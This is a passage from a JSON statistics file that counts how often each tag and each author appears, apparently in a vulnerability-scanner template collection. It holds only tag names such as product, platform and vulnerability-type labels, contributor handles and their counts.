1},{"name":"krweb","count":1},{"name":"chyoa","count":1},{"name":"routeros","count":1},{"name":"pendinginstallvzw","count":1},{"name":"tup","count":1},{"name":"academy","count":1},{"name":"ipdata","count":1},{"name":"latency","count":1},{"name":"hometechsocial-mastodon-instance","count":1},{"name":"watchmemorecom","count":1},{"name":"fancentro","count":1},{"name":"exposures","count":1},{"name":"verify","count":1},{"name":"qualcomm","count":1},{"name":"opensns","count":1},{"name":"wp-stats-manager","count":1},{"name":"biqsdrive","count":1},{"name":"ubiquiti","count":1},{"name":"finereport","count":1},{"name":"labtech","count":1},{"name":"tinder","count":1},{"name":"mdb","count":1},{"name":"visnesscard","count":1},{"name":"particle","count":1},{"name":"wbcecms","count":1},{"name":"bookstack","count":1},{"name":"oscommerce","count":1},{"name":"vercel","count":1},{"name":"arprice-responsive-pricing-table","count":1},{"name":"adb","count":1},{"name":"employment","count":1},{"name":"ticketmaster","count":1},{"name":"nimble","count":1},{"name":"hamaha","count":1},{"name":"dwr","count":1},{"name":"musiciansocial-mastodon-instance","count":1},{"name":"rudloff","count":1},{"name":"soar","count":1},{"name":"kenesto","count":1},{"name":"payroll","count":1},{"name":"plurk","count":1},{"name":"nirweb-support","count":1},{"name":"netman","count":1},{"name":"socialbundde","count":1},{"name":"librenms","count":1},{"name":"hatenablog","count":1},{"name":"posthog","count":1},{"name":"drone","count":1},{"name":"tor","count":1},{"name":"jreport","count":1},{"name":"cliniccases","count":1},{"name":"mcname-minecraft","count":1},{"name":"calendarix","count":1},{"name":"appweb","count":1},{"name":"cdata","count":1},{"name":"emerson","count":1},{"name":"activecollab","count":1},{"name":"block","count":1},{"name":"woocs","count":1},{"name":"kotburger","count":1},{"name":"avigilon","count":1},{"name":"opengear","count":1},{"name":"sensor","count":1},{"name":"polygon","count":1},{"name":"surveysparrow","count":1},{"name":"chamsko","count":1},{"name":"b2evolution","count":1},{"name":"html2wp","count":1},{"name":"microfinance","count":1},{"name":"clickup","count":1},{"name":"tamronos","count":1},{"name":"appian","count":1},{"name":"kvm","count":1},{"name":"documentor-lite","count":1},{"name":"portmap","count":1},{"name":"fodors-forum","count":1},{"name":"zmarsacom","count":1},{"name":"arcade","count":1},{"name":"transmission","count":1},{"name":"visualstudio","count":1},{"name":"evilginx","count":1},{"name":"cocca","count":1},{"name":"prvpl","count":1},{"name":"zhihu","count":1},{"name":"datataker","count":1},{"name":"vero","count":1},{"name":"viaware","count":1},{"name":"refsheet","count":1},{"name":"serpstack","count":1},{"name":"couchcms","count":1},{"name":"bikemap","count":1},{"name":"locklizard","count":1},{"name":"redcap","count":1},{"name":"oneinstack","count":1},{"name":"go-ibax","count":1},{"name":"mura","count":1},{"name":"kongregate","count":1},{"name":"playable","count":1},{"name":"stackoverflow","count":1},{"name":"vsphere","count":1},{"name":"cvent","count":1},{"name":"vklworld-mastodon-instance","count":1},{"name":"blipfm","count":1},{"name":"commerce","count":1},{"name":"ipanel","count":1},{"name":"spectracom","count":1},{"name":"foss","count":1},{"name":"machform","count":1},{"name":"wallix","count":1},{"name":"kyan","count":1},{"name":"zcms","count":1},{"name":"bitquery","count":1},{"name":"jinfornet","count":1},{"name":"mailboxvalidator","count":1},{"name":"bottle","count":1},{"name":"behance","count":1},{"name":"privatekey","count":1},{"name":"carbonmade","count":1},{"name":"leostream","count":1},{"name":"zarafa","count":1},{"name":"cloudanalytics","count":1},{"name":"xdebug","count":1},{"name":"skywalking","count":1},{"name":"teddygirls","count":1},{"name":"api2convert","count":1},{"name":"wp-fundraising-donation","count":1},{"name":"taxonomies-change-checkbox-to-radio-buttons","count":1},{"name":"webclient","count":1},{"name":"speedrun","count":1},{"name":"fortiddos","count":1},{"name":"t3","count":1},{"name":"easyen","count":1},{"name":"socomec","count":1},{"name":"vision","count":1},{"name":"sentinelone","count":1},{"name":"leadpages","count":1},{"name":"pagecdn","count":1},{"name":"msmq","count":1},{"name":"wmt","count":1},{"name":"qsan","count":1},{"name":"essential-real-estate","count":1},{"name":"ocomon","count":1},{"name":"unsplash","count":1},{"name":"postmark","count":1},{"name":"nagvis","count":1},{"name":"sslmate","count":1},{"name":"gsoap","count":1},{"name":"announcekit","count":1},{"name":"ruoyi","count":1},{"name":"tink","count":1},{"name":"wpb-show-core","count":1},{"name":"netic","count":1},{"name":"hoobe","count":1},{"name":"bonga-cams","count":1},{"name":"free5gc","count":1},{"name":"neobox","count":1},{"name":"tumblr","count":1},{"name":"phpwiki","count":1},{"name":"media","count":1},{"name":"netgenie","count":1},{"name":"spreadsheet-reader","count":1},{"name":"tengine","count":1},{"name":"nutanix","count":1},{"name":"veriz0wn","count":1},{"name":"luftguitar","count":1},{"name":"libvirt","count":1},{"name":"blackbox","count":1},{"name":"orchard","count":1},{"name":"pichome","count":1},{"name":"dailymotion","count":1},{"name":"trassir","count":1},{"name":"mylittleadmin","count":1},{"name":"mailmap","count":1},{"name":"picsart","count":1},{"name":"imagefap","count":1},{"name":"soccitizen4eu","count":1},{"name":"cofax","count":1},{"name":"nvrsolo","count":1},{"name":"hiboss","count":1},{"name":"quiz","count":1},{"name":"jaspersoft","count":1},{"name":"pushgateway","count":1},{"name":"ibax","count":1},{"name":"engage","count":1},{"name":"jejapl","count":1},{"name":"openproject","count":1},{"name":"openweather","count":1},{"name":"steller","count":1},{"name":"n-media-woocommerce-checkout-fields","count":1},{"name":"stackstorm","count":1},{"name":"bitdefender","count":1},{"name":"binom","count":1},{"name":"polchatpl","count":1},{"name":"ilch","count":1},{"name":"novus","count":1},{"name":"pypicloud","count":1},{"name":"catfishcms","count":1},{"name":"mastodon-polsocial","count":1},{"name":"rainloop","count":1},{"name":"yzmcms","count":1},{"name":"brickset","count":1},{"name":"i3geo","count":1},{"name":"vernemq","count":1},{"name":"sumowebtools","count":1},{"name":"shopizer","count":1},{"name":"guppy","count":1},{"name":"ocs-inventory","count":1},{"name":"nette","count":1},{"name":"apteka","count":1},{"name":"objectinjection","count":1},{"name":"basic-auth","count":1},{"name":"fabswingers","count":1},{"name":"teslamate","count":1},{"name":"reprise","count":1},{"name":"myfitnesspal-author","count":1},{"name":"lite","count":1},{"name":"cd-action","count":1},{"name":"bitrise","count":1},{"name":"graphiql","count":1},{"name":"properties","count":1},{"name":"nitecrew-mastodon-instance","count":1},{"name":"cscart","count":1},{"name":"zendframework","count":1},{"name":"poll-everywhere","count":1},{"name":"all-in-one-wp-migration","count":1},{"name":"utility","count":1},{"name":"codewars","count":1},{"name":"pewex","count":1},{"name":"disabledrocks-mastodon-instance","count":1},{"name":"1forge","count":1},{"name":"aaha-chat","count":1},{"name":"ncbi","count":1},{"name":"naver","count":1},{"name":"barracuda","count":1},{"name":"wavemaker","count":1},{"name":"advfn","count":1},{"name":"internet-archive-account","count":1},{"name":"voice123","count":1},{"name":"kaseya","count":1},{"name":"mediakits","count":1},{"name":"phpmemcached","count":1},{"name":"freelancer","count":1},{"name":"depop","count":1},{"name":"hashnode","count":1},{"name":"faspex","count":1},{"name":"fansly","count":1},{"name":"aflam","count":1},{"name":"pokec","count":1},{"name":"etherscan","count":1},{"name":"satellite","count":1},{"name":"librarything","count":1},{"name":"fedora","count":1},{"name":"simple-file-list","count":1},{"name":"xiuno","count":1},{"name":"genie","count":1},{"name":"paytm","count":1},{"name":"apex-legends","count":1},{"name":"mongo-express","count":1},{"name":"netbiblio","count":1},{"name":"hydra","count":1},{"name":"21buttons","count":1},{"name":"maxsite","count":1},{"name":"mix","count":1},{"name":"openssl","count":1},{"name":"calendly","count":1},{"name":"webnms","count":1},{"name":"pie","count":1},{"name":"girlfriendsmeet","count":1},{"name":"dss","count":1},{"name":"chefio","count":1},{"name":"twitch","count":1},{"name":"avalanche","count":1},{"name":"tracking","count":1},{"name":"musicstore","count":1},{"name":"gofile","count":1},{"name":"ftp-backdoor","count":1},{"name":"cherokee","count":1},{"name":"affiliates-manager","count":1},{"name":"mixlr","count":1},{"name":"quora","count":1},{"name":"ethereum","count":1},{"name":"pdf-generator-for-wp","count":1},{"name":"utipio","count":1},{"name":"prototype","count":1},{"name":"secmail","count":1},{"name":"tox","count":1},{"name":"nairaland","count":1},{"name":"webp","count":1},{"name":"roads","count":1},{"name":"phoenix","count":1},{"name":"securitytrails","count":1},{"name":"optiLink","count":1},{"name":"holidayapi","count":1},{"name":"linear","count":1},{"name":"etouch","count":1},{"name":"fatwire","count":1},{"name":"processmaker","count":1},{"name":"piekielni","count":1},{"name":"pulsarui","count":1},{"name":"vr-calendar-sync","count":1},{"name":"ipdiva","count":1},{"name":"discusssocial-mastodon-instance","count":1},{"name":"zillow","count":1},{"name":"quasar","count":1},{"name":"projectdiscovery","count":1},{"name":"stonerssocial-mastodon-instance","count":1},{"name":"public","count":1},{"name":"saracartershow","count":1},{"name":"ecsimagingpacs","count":1},{"name":"mylittlebackup","count":1},{"name":"eureka","count":1},{"name":"bandlab","count":1},{"name":"pokerstrategy","count":1},{"name":"totalwar","count":1},{"name":"flexbe","count":1},{"name":"prexview","count":1},{"name":"wpify","count":1},{"name":"hackerrank","count":1},{"name":"vibe","count":1},{"name":"rackup","count":1},{"name":"ilovegrowingmarijuana","count":1},{"name":"mastodon-mastodon","count":1},{"name":"snapchat-stories","count":1},{"name":"master","count":1},{"name":"trojan","count":1},{"name":"razer","count":1},{"name":"mesos","count":1},{"name":"wolni-slowianie","count":1},{"name":"bigo-live","count":1},{"name":"metacritic","count":1},{"name":"prismaweb","count":1},{"name":"webpconverter","count":1},{"name":"fortilogger","count":1},{"name":"mitel","count":1},{"name":"ios","count":1},{"name":"realteo","count":1},{"name":"hubski","count":1},{"name":"fanpop","count":1},{"name":"formalms","count":1},{"name":"babypips","count":1},{"name":"karabin","count":1},{"name":"megamodelspl","count":1},{"name":"personal-dictionary","count":1},{"name":"teradici","count":1},{"name":"solikick","count":1},{"name":"mi","count":1},{"name":"line","count":1},{"name":"gunicorn","count":1},{"name":"dropbox","count":1},{"name":"gemweb","count":1},{"name":"jedox","count":1},{"name":"zenserp","count":1},{"name":"mastodonchasedemdev-mastodon-instance","count":1},{"name":"osu","count":1},{"name":"vcloud","count":1},{"name":"mongoshake","count":1},{"name":"magicflow","count":1},{"name":"blogmarks","count":1},{"name":"react","count":1},{"name":"webdav","count":1},{"name":"nytimes","count":1},{"name":"supportivekoala","count":1},{"name":"anonup","count":1},{"name":"open-school","count":1},{"name":"fiverr","count":1},{"name":"spirit","count":1},{"name":"tutorlms","count":1},{"name":"intellifuel","count":1},{"name":"cashapp","count":1},{"name":"mailer","count":1},{"name":"gsm","count":1},{"name":"web3storage","count":1},{"name":"esmtp","count":1},{"name":"scalar","count":1},{"name":"darudar","count":1},{"name":"destructoid","count":1},{"name":"vimeo","count":1},{"name":"fancyproduct","count":1},{"name":"justwriting","count":1},{"name":"all-in-one-video-gallery","count":1},{"name":"tracer","count":1},{"name":"pihole","count":1},{"name":"knowage","count":1},{"name":"patriots-win","count":1},{"name":"springframework","count":1},{"name":"blueiris","count":1},{"name":"turbo","count":1},{"name":"system","count":1},{"name":"codeforces","count":1},{"name":"openstreetmap","count":1},{"name":"altenergy","count":1},{"name":"gozi","count":1},{"name":"stytch","count":1},{"name":"ssi","count":1},{"name":"furaffinity","count":1},{"name":"jeecg-boot","count":1},{"name":"fudforum","count":1},{"name":"simpleclientmanagement","count":1},{"name":"coinranking","count":1},{"name":"colourlovers","count":1},{"name":"currencyscoop","count":1},{"name":"defi","count":1},{"name":"spx-php","count":1},{"name":"scrutinizer","count":1},{"name":"ghostcms","count":1},{"name":"omniampx","count":1},{"name":"shutterstock","count":1},{"name":"buzznet","count":1},{"name":"rocketmq","count":1},{"name":"droners","count":1},{"name":"aurall","count":1},{"name":"helloprint","count":1},{"name":"archibus","count":1},{"name":"timeclock","count":1},{"name":"aboutme","count":1},{"name":"mastodon-rigczclub","count":1},{"name":"soplanning","count":1},{"name":"tbk","count":1},{"name":"fontsy","count":1},{"name":"intellect","count":1},{"name":"meteor","count":1},{"name":"gateone","count":1},{"name":"dnn","count":1},{"name":"ucs","count":1},{"name":"savepage","count":1},{"name":"privx","count":1},{"name":"doh","count":1},{"name":"altn","count":1},{"name":"onelogin","count":1},{"name":"clickhouse","count":1},{"name":"maillist","count":1},{"name":"tcexam","count":1},{"name":"arris","count":1},{"name":"age-verification","count":1},{"name":"wikidot","count":1},{"name":"ddownload","count":1},{"name":"hackaday","count":1},{"name":"liberty","count":1},{"name":"qdpm","count":1},{"name":"twilio","count":1},{"name":"scoutwiki","count":1},{"name":"webex","count":1},{"name":"shindig","count":1},{"name":"cachet","count":1},{"name":"cloudfoundry","count":1},{"name":"extractor","count":1},{"name":"wego","count":1},{"name":"mastodon-climatejusticerocks","count":1},{"name":"xyxel","count":1},{"name":"imgsrcru","count":1},{"name":"filmweb","count":1},{"name":"rpcbind","count":1},{"name":"zmanda","count":1},{"name":"mastodon-api","count":1},{"name":"vmstio-mastodon-instance","count":1},{"name":"sceditor","count":1},{"name":"orcus","count":1},{"name":"wpquery","count":1},{"name":"raspberry","count":1},{"name":"rsyncd","count":1},{"name":"piwik","count":1},{"name":"udraw","count":1},{"name":"hiawatha","count":1},{"name":"ebay","count":1},{"name":"naija-planet","count":1},{"name":"orangeforum","count":1},{"name":"wp-autosuggest","count":1},{"name":"faraday","count":1},{"name":"love-ru","count":1},{"name":"jalios","count":1},{"name":"igromania","count":1},{"name":"flowdash","count":1},{"name":"networkdb","count":1},{"name":"cudatel","count":1},{"name":"refresh","count":1},{"name":"trilium","count":1},{"name":"diigo","count":1},{"name":"motokiller","count":1},{"name":"joomsport-sports-league-results-management","count":1},{"name":"deimosc2","count":1},{"name":"buymeacoffee","count":1},{"name":"ninja","count":1},{"name":"usa-life","count":1},{"name":"piano","count":1},{"name":"pfblockerng","count":1},{"name":"zomato","count":1},{"name":"pandorafms","count":1},{"name":"sitefinity","count":1},{"name":"stestr","count":1},{"name":"onlinefarm","count":1},{"name":"achecker","count":1},{"name":"biotime","count":1},{"name":"mojoauth","count":1},{"name":"yachtcontrol","count":1},{"name":"self-signed","count":1},{"name":"cooperhewitt","count":1},{"name":"wp-cli","count":1},{"name":"vivotex","count":1},{"name":"adafruit","count":1},{"name":"cohost","count":1},{"name":"mspcontrol","count":1},{"name":"microservice","count":1},{"name":"parentlink","count":1},{"name":"machproweb","count":1},{"name":"netbeans","count":1},{"name":"biggerpockets","count":1},{"name":"eg","count":1},{"name":"rsshub","count":1},{"name":"elemiz","count":1},{"name":"ourmgmt3","count":1},{"name":"artbreeder","count":1},{"name":"dateinasia","count":1},{"name":"esxi","count":1},{"name":"armorgames","count":1},{"name":"clearcom","count":1},{"name":"mastodon-tootcommunity","count":1},{"name":"aicloud","count":1},{"name":"qts","count":1},{"name":"shanii-writes","count":1},{"name":"bazarr","count":1},{"name":"mod-db","count":1},{"name":"fontawesome","count":1},{"name":"secnet","count":1},{"name":"eos","count":1},{"name":"olx","count":1},{"name":"rmi","count":1},{"name":"platzi","count":1},{"name":"gocron","count":1},{"name":"k8","count":1},{"name":"spf","count":1},{"name":"autocomplete","count":1},{"name":"axel","count":1},{"name":"maestro","count":1},{"name":"bitcoin","count":1},{"name":"jspxcms","count":1},{"name":"routes","count":1},{"name":"okru","count":1},{"name":"lob","count":1},{"name":"fhem","count":1},{"name":"svnserve","count":1},{"name":"theguardian","count":1},{"name":"xdcms","count":1},{"name":"eclipsebirt","count":1},{"name":"contentful","count":1},{"name":"alerta","count":1},{"name":"blogipl","count":1},{"name":"revolut","count":1},{"name":"msmswitch","count":1},{"name":"zerodium","count":1},{"name":"asanhamayesh","count":1},{"name":"wpcargo","count":1},{"name":"calendar","count":1},{"name":"bruteratel","count":1},{"name":"floc","count":1},{"name":"apigee","count":1},{"name":"systemmanager","count":1},{"name":"mastodon-chaossocial","count":1},{"name":"dcrat","count":1},{"name":"edms","count":1},{"name":"orangehrm","count":1},{"name":"ti-woocommerce-wishlist","count":1},{"name":"navigate","count":1},{"name":"thinkserver","count":1},{"name":"parler","count":1},{"name":"elevation","count":1},{"name":"phpok","count":1},{"name":"suprema","count":1},{"name":"dqs","count":1},{"name":"fandom","count":1},{"name":"caa","count":1},{"name":"vanguard","count":1},{"name":"np","count":1},{"name":"junos","count":1},{"name":"agilecrm","count":1},{"name":"lumis","count":1},{"name":"fastapi","count":1},{"name":"wagtail","count":1},{"name":"kickstarter","count":1},{"name":"nedi","count":1},{"name":"speakout-email-petitions","count":1},{"name":"debian","count":1},{"name":"bimpos","count":1},{"name":"storybook","count":1},{"name":"wp-slimstat","count":1},{"name":"stridercd","count":1},{"name":"spidercontrol","count":1},{"name":"d-link","count":1},{"name":"bigfix","count":1},{"name":"honeywell","count":1},{"name":"medyczkapl","count":1},{"name":"hanwang","count":1},{"name":"oliver","count":1},{"name":"pollbot","count":1},{"name":"oxid","count":1},{"name":"tekon","count":1},{"name":"jbpm","count":1},{"name":"sensu","count":1},{"name":"thecatapi","count":1},{"name":"atvise","count":1},{"name":"infographic-and-list-builder-ilist","count":1},{"name":"mastodon-101010pl","count":1},{"name":"stem","count":1},{"name":"i-mscp","count":1},{"name":"diris","count":1},{"name":"normhost","count":1},{"name":"obsidian","count":1},{"name":"mstore-api","count":1},{"name":"everything","count":1},{"name":"wordpress-support","count":1},{"name":"wikipedia","count":1},{"name":"armember-membership","count":1},{"name":"login-bypass","count":1},{"name":"cheezburger","count":1},{"name":"minimouse","count":1},{"name":"vk","count":1},{"name":"multilaser","count":1},{"name":"pinkbike","count":1},{"name":"blitapp","count":1},{"name":"cracked","count":1},{"name":"elloco","count":1},{"name":"magabook","count":1},{"name":"sponip","count":1},{"name":"airliners","count":1},{"name":"xanga","count":1},{"name":"qizhi","count":1},{"name":"discord","count":1},{"name":"huemagic","count":1},{"name":"acexy","count":1},{"name":"smartgateway","count":1},{"name":"wp-experiments-free","count":1},{"name":"intouch","count":1},{"name":"AlphaWeb","count":1},{"name":"route","count":1},{"name":"eventtickets","count":1},{"name":"jumpserver","count":1},{"name":"jabber","count":1},{"name":"eyou","count":1},{"name":"insanejournal","count":1},{"name":"notion","count":1},{"name":"activeadmin","count":1},{"name":"bolt","count":1},{"name":"iclock","count":1},{"name":"tmdb","count":1},{"name":"curcy","count":1},{"name":"adserver","count":1},{"name":"monitorix","count":1},{"name":"nsq","count":1},{"name":"n-central","count":1},{"name":"untrusted","count":1},{"name":"awin","count":1},{"name":"donation-alerts","count":1},{"name":"xds","count":1},{"name":"checkmarx","count":1},{"name":"openvz","count":1},{"name":"giters","count":1},{"name":"streamelements","count":1},{"name":"php-fusion","count":1},{"name":"jgraph","count":1},{"name":"newspaper","count":1},{"name":"angularjs","count":1},{"name":"careerhabr","count":1},{"name":"fandalism","count":1},{"name":"jk","count":1},{"name":"wykop","count":1},{"name":"urlscan","count":1},{"name":"jenzabar","count":1},{"name":"instructables","count":1},{"name":"hugging-face","count":1},{"name":"dbt","count":1},{"name":"ipinfo","count":1},{"name":"mpftvc","count":1},{"name":"workerman","count":1},{"name":"sling","count":1},{"name":"dreamweaver","count":1},{"name":"encompass","count":1},{"name":"castingcallclub","count":1},{"name":"hihello","count":1},{"name":"wishlistr","count":1},{"name":"bonita","count":1},{"name":"openbb","count":1},{"name":"sungrow","count":1},{"name":"garmin-connect","count":1},{"name":"content-central","count":1},{"name":"cgit","count":1},{"name":"st","count":1},{"name":"cdn","count":1},{"name":"signet","count":1},{"name":"moduweb","count":1},{"name":"report","count":1},{"name":"dir-615","count":1},{"name":"woc-order-alert","count":1},{"name":"flatpm","count":1},{"name":"tensorboard","count":1},{"name":"wp-gdpr-compliance","count":1},{"name":"mastodon","count":1},{"name":"asgaros-forum","count":1},{"name":"fuddorum","count":1},{"name":"1001mem","count":1},{"name":"ko-fi","count":1},{"name":"titan-framework","count":1},{"name":"yarn","count":1},{"name":"codeception","count":1},{"name":"upnp","count":1},{"name":"akniga","count":1},{"name":"bookcrossing","count":1},{"name":"interpals","count":1},{"name":"cloudrun","count":1},{"name":"viper","count":1},{"name":"directum","count":1},{"name":"themeforest","count":1},{"name":"schneider","count":1},{"name":"sensei-lms","count":1},{"name":"erp-nc","count":1},{"name":"ransomware","count":1},{"name":"control","count":1},{"name":"slstudio","count":1},{"name":"gravatar","count":1},{"name":"farkascity","count":1},{"name":"palnet","count":1},{"name":"cvms","count":1},{"name":"restler","count":1},{"name":"arl","count":1},{"name":"monday","count":1},{"name":"shoppable","count":1},{"name":"dmarc","count":1},{"name":"visionhub","count":1},{"name":"rpcms","count":1},{"name":"readthedocs","count":1},{"name":"ampguard","count":1},{"name":"trino","count":1},{"name":"parler-archived-posts","count":1},{"name":"business","count":1},{"name":"couchsurfing","count":1},{"name":"cafecito","count":1},{"name":"openshift","count":1},{"name":"gurock","count":1},{"name":"openid","count":1},{"name":"smarterstats","count":1},{"name":"my-instants","count":1},{"name":"kodexplorer","count":1},{"name":"h5s","count":1},{"name":"autonomy","count":1},{"name":"wiki","count":1},{"name":"e2pdf","count":1},{"name":"cvsweb","count":1},{"name":"superwebmailer","count":1},{"name":"twpro","count":1},{"name":"photostation","count":1},{"name":"ns","count":1},{"name":"mediumish","count":1},{"name":"synnefo","count":1},{"name":"inaturalist","count":1},{"name":"coverity","count":1},{"name":"wazuh","count":1},{"name":"currencylayer","count":1},{"name":"sourcebans","count":1},{"name":"mara","count":1},{"name":"sgp","count":1},{"name":"robomongo","count":1},{"name":"zenphoto","count":1},{"name":"blockfrost","count":1},{"name":"buttercms","count":1},{"name":"web-dispatcher","count":1},{"name":"scratch","count":1},{"name":"wordcloud","count":1},{"name":"reblogme","count":1},{"name":"webasyst","count":1},{"name":"oauth2","count":1},{"name":"mkdocs","count":1},{"name":"casemanager","count":1},{"name":"hoteldrui","count":1},{"name":"fastpanel","count":1},{"name":"vodafone","count":1},{"name":"raspberrymatic","count":1},{"name":"solman","count":1},{"name":"airnotifier","count":1}],"authors":[{"name":"dhiyaneshdk","count":882},{"name":"dwisiswant0","count":796},{"name":"daffainfo","count":664},{"name":"pikpikcu","count":353},{"name":"pdteam","count":280},{"name":"pussycat0x","count":258},{"name":"geeknik","count":221},{"name":"ricardomaia","count":220},{"name":"ritikchaddha","count":217},{"name":"0x_akoko","count":179},{"name":"theamanrawat","count":166},{"name":"princechaddha","count":156},{"name":"gy741","count":144},{"name":"arafatansari","count":119},{"name":"tess","count":109},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":63},{"name":"akincibor","count":58},{"name":"for3stco1d","count":55},{"name":"r3y3r53","count":51},{"name":"gaurang","count":42},{"name":"philippedelteil","count":41},{"name":"righettod","count":41},{"name":"edoardottt","count":40},{"name":"pdresearch","count":39},{"name":"c-sh0","count":35},{"name":"adam crosser","count":31},{"name":"iamnoooob","count":29},{"name":"rootxharsh","count":28},{"name":"ice3man","count":26},{"name":"hardik-solanki","count":24},{"name":"pwnhxl","count":24},{"name":"organiccrap","count":24},{"name":"johnk3r","count":23},{"name":"techbrunchfr","count":23},{"name":"ffffffff0x","count":22},{"name":"j4vaovo","count":20},{"name":"sullo","count":18},{"name":"cckuailong","count":18},{"name":"parthmalhotra","count":16},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"ctflearner","count":15},{"name":"random-robbie","count":15},{"name":"r3dg33k","count":14},{"name":"milo2012","count":14},{"name":"melbadry9","count":13},{"name":"tenbird","count":13},{"name":"0ri2n","count":13},{"name":"sharath","count":13},{"name":"theabhinavgaur","count":13},{"name":"lu4nx","count":12},{"name":"suman_kar","count":12},{"name":"wdahlenb","count":11},{"name":"dogasantos","count":11},{"name":"elsfa7110","count":11},{"name":"cyllective","count":11},{"name":"meme-lord","count":10},{"name":"random_robbie","count":10},{"name":"co5mos","count":10},{"name":"hackergautam","count":10},{"name":"logicalhunter","count":10},{"name":"nadino","count":10},{"name":"alph4byt3","count":10},{"name":"nullfuzz","count":9},{"name":"fabaff","count":9},{"name":"0xpugazh","count":9},{"name":"0x240x23elu","count":9},{"name":"oppsec","count":9},{"name":"emadshanab","count":9},{"name":"_0xf4n9x_","count":8},{"name":"olearycrew","count":8},{"name":"that_juan_","count":8},{"name":"harsh","count":8},{"name":"aashiq","count":8},{"name":"zh","count":8},{"name":"veshraj","count":8},{"name":"iamthefrogy","count":8},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"its0x08","count":7},{"name":"adamcrosser","count":7},{"name":"techryptic (@tech)","count":7},{"name":"leovalcante","count":7},{"name":"caspergn","count":7},{"name":"amit-jd","count":7},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":7},{"name":"dr_set","count":7},{"name":"kophjager007","count":7},{"name":"divya_mudgal","count":7},{"name":"__fazal","count":6},{"name":"xelkomy","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"clem9669","count":6},{"name":"pentest_swissky","count":6},{"name":"forgedhallpass","count":6},{"name":"nodauf","count":6},{"name":"evan rubinstein","count":6},{"name":"devang-solanki","count":6},{"name":"ja1sh","count":6},{"name":"justaacat","count":6},{"name":"imnightmaree","count":6},{"name":"pathtaga","count":6},{"name":"puzzlepeaches","count":6},{"name":"gitlab red team","count":6},{"name":"r12w4n","count":5},{"name":"panch0r3d","count":5},{"name":"joanbono","count":5},{"name":"podalirius","count":5},{"name":"kh4sh3i","count":5},{"name":"yanyun","count":5},{"name":"ganofins","count":5},{"name":"s0obi","count":5},{"name":"defr0ggy","count":5},{"name":"prajiteshsingh","count":5},{"name":"mr-xn","count":5},{"name":"robotshell","count":5},{"name":"vicrack","count":5},{"name":"wisnupramoedya","count":4},{"name":"tanq16","count":4},{"name":"dolev farhi","count":4},{"name":"incogbyte","count":4},{"name":"h1ei1","count":4},{"name":"e_schultze_","count":4},{"name":"3th1c_yuk1","count":4},{"name":"shine","count":4},{"name":"powerexploit","count":4},{"name":"dadevel","count":4},{"name":"r3naissance","count":4},{"name":"scent2d","count":4},{"name":"binaryfigments","count":3},{"name":"whoever","count":3},{"name":"dr0pd34d","count":3},{"name":"alifathi-h1","count":3},{"name":"skeltavik","count":3},{"name":"vagnerd","count":3},{"name":"_generic_human_","count":3},{"name":"arcc","count":3},{"name":"ekrause","count":3},{"name":"andydoering","count":3},{"name":"jarijaas","count":3},{"name":"swissky","count":3},{"name":"cheesymoon","count":3},{"name":"unstabl3","count":3},{"name":"impramodsargar","count":3},{"name":"hahwul","count":3},{"name":"emenalf","count":3},{"name":"vsh00t","count":3},{"name":"matt galligan","count":3},{"name":"fyoorer","count":3},{"name":"shifacyclewala","count":3},{"name":"z3bd","count":3},{"name":"huowuzhao","count":3},{"name":"ph33r","count":3},{"name":"johnjhacking","count":3},{"name":"canberbamber","count":3},{"name":"mavericknerd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"bernardofsr","count":3},{"name":"lark-lab","count":3},{"name":"f1tz","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"ambassify","count":3},{"name":"splint3r7","count":3},{"name":"davidmckennirey","count":3},{"name":"kazet","count":3},{"name":"evergreencartoons","count":3},{"name":"sushantkamble","count":3},{"name":"me9187","count":3},{"name":"taielab","count":3},{"name":"dudez","count":3},{"name":"atomiczsec","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"badboycxcc","count":3},{"name":"bhutch","count":3},{"name":"fxploit","count":3},{"name":"mastercho","count":3},{"name":"arm!tage","count":3},{"name":"true13","count":3},{"name":"lucasljm2001","count":3},{"name":"0w4ys","count":3},{"name":"k0pak4","count":3},{"name":"cckuakilong","count":2},{"name":"udit_thakkur","count":2},{"name":"666asd","count":2},{"name":"heeress","count":2},{"name":"bsysop","count":2},{"name":"rafaelwdornelas","count":2},{"name":"d4vy","count":2},{"name":"joshlarsen","count":2},{"name":"ree4pwn","count":2},{"name":"supras","count":2},{"name":"brucelsone","count":2},{"name":"m4lwhere","count":2},{"name":"n-thumann","count":2},{"name":"socketz","count":2},{"name":"kre80r","count":2},{"name":"ehsahil","count":2},{"name":"redteambrasil","count":2},{"name":"nybble04","count":2},{"name":"wa1tf0rme","count":2},{"name":"codexlynx","count":2},{"name":"dogancanbakir","count":2},{"name":"martincodes-de","count":2},{"name":"coldfish","count":2},{"name":"8arthur","count":2},{"name":"koti2","count":2},{"name":"nvn1729","count":2},{"name":"dbrwsky","count":2},{"name":"megamansec","count":2},{"name":"w4cky_","count":2},{"name":"uomogrande","count":2},{"name":"thardt-praetorian","count":2},{"name":"x1m_martijn","count":2},{"name":"github.com/its0x08","count":2},{"name":"0xsapra","count":2},{"name":"0xelkomy","count":2},{"name":"lotusdll","count":2},{"name":"amsda","count":2},{"name":"bp0lr","count":2},{"name":"bing0o","count":2},{"name":"streetofhackerr007","count":2},{"name":"paradessia","count":2},{"name":"dahse89","count":2},{"name":"convisoappsec","count":2},{"name":"0xrudra","count":2},{"name":"manas_harsh","count":2},{"name":"hetroublemakr","count":2},{"name":"brenocss","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"notnotnotveg","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"shelled","count":2},{"name":"afaq","count":2},{"name":"0xsmiley","count":2},{"name":"y4er","count":2},{"name":"g4l1t0","count":2},{"name":"myztique","count":2},{"name":"sinkettu","count":2},{"name":"bananabr","count":2},{"name":"vavkamil","count":2},{"name":"paperpen","count":2},{"name":"v0idc0de","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"sbani","count":2},{"name":"lum8rjack","count":2},{"name":"thezakman","count":2},{"name":"clarkvoss","count":2},{"name":"geekby","count":2},{"name":"cocxanh","count":2},{"name":"foulenzer","count":2},{"name":"zomsop82","count":2},{"name":"randomrobbie","count":2},{"name":"sy3omda","count":2},{"name":"cristi vlad 